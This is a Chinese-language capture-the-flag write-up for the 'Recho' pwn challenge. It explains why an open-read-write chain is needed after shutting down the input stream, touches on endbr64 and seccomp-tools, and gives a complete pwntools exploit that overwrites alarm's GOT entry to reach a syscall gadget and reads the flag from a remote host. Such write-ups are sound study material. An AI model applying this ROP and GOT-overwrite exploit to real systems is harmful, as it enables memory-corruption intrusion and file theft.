极其折磨的一道题，就像其他WP中提到的，需要ORW和pwntools shutdown结束输入流，我这里不再说和别人一样的内容了，讲一讲整个痛苦的解题过程。

翻到别人的WP都是用syscall来做ORW的，第一反应就是，既然能syscall，为啥不直接getshell？毕竟有gadget可以写任意内存，写个"/bin/sh\x00"也不是什么难事，然后就感受到了这题最坑的地方：结束输入流，如果不跳出这个循环的话就没法做ROP，但跳出之后由于已经shutdown send了，交互都没法进行，getshell的希望直接被掐灭。

然后是第二个痛点，endbr 64指令，具体参考可以看这篇博客https://blog.csdn.net/clh14281055/article/details/117446588，简单来说就是intel新加的一条安全性检查的指令，大部分情况下视作nop即可，但这条指令事实上已用到最新版本的libc中，如果你的libc版本足够新且CPU也不是十多年前的古董的话大概率libc库函数第一条指令就是endbr 64，而这和服务器上是不一致的。

为了弄明白什么时候要用ORW我去下了seccomp-tools这个工具，跑出来的结果和我在网上看到的大相径庭，至今没搞清楚原因。

最后是open之后的fd，linux中默认的file descriptor有三个分别是0，1，2，open之后的返回的fd一般为3，对我来说也算是冷知识了，可以简单验证下：

#include <fcntl.h>
#include <stdio.h>

int main() {
  int fd;
  fd = open("sol.py", O_RDONLY);
  printf("%d", fd);
}

以上就是花了半天时间整理的痛点，剩下的留给exp：

from pwn import *


def rechosend(r: remote, lenth: int, data: bytes):
    r.sendline(str(lenth))
    r.sendline(data)


context.log_level = "debug"
# r = process("./Recho")
r = remote("111.200.241.244", 58265)
elf = ELF("./Recho")

pop_rax = 0x4006fc
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
add_rdi = 0x40070d
flag_addr = elf.sym["flag"]
syscall = elf.plt["alarm"]

r.recvuntil("Welcome to Recho server!\n")
payload = cyclic(0x38)
payload += p64(pop_rdi) + p64(elf.got["alarm"])
payload += p64(pop_rax) + p64(0x5)
payload += p64(add_rdi)
# change alarm_got to syscall

payload += p64(pop_rax) + p64(2)  # sys_open
payload += p64(pop_rdi) + p64(flag_addr)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)  # O_RDONLY
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)
# open("flag", 0, 0)

payload += p64(pop_rax) + p64(0)  # sys_read
payload += p64(pop_rdi) + p64(3)  # open's fd
payload += p64(pop_rsi_r15) + p64(elf.bss(0)) + p64(0)  # write on .bss
payload += p64(pop_rdx) + p64(40)
payload += p64(syscall)
# read(3, bss_addr, 40)

payload += p64(pop_rax) + p64(1)  # sys_write
payload += p64(pop_rdi) + p64(1)  # stdout's fd
payload += p64(pop_rsi_r15) + p64(elf.bss(0)) + p64(0)  # write on stdout
payload += p64(pop_rdx) + p64(40)
payload += p64(syscall)
# write(1, bss_addr, 40)

rechosend(r, 0x200, payload.ljust(0x200, b"\x00"))
r.shutdown("send")
r.interactive()

# 0x000000000040070d: add byte ptr [rdi], al; ret;
# 0x00000000004006fc: pop rax; ret;
# 0x00000000004008a3: pop rdi; ret;
# 0x00000000004006fe: pop rdx; ret;
# 0x00000000004008a1: pop rsi; pop r15; ret;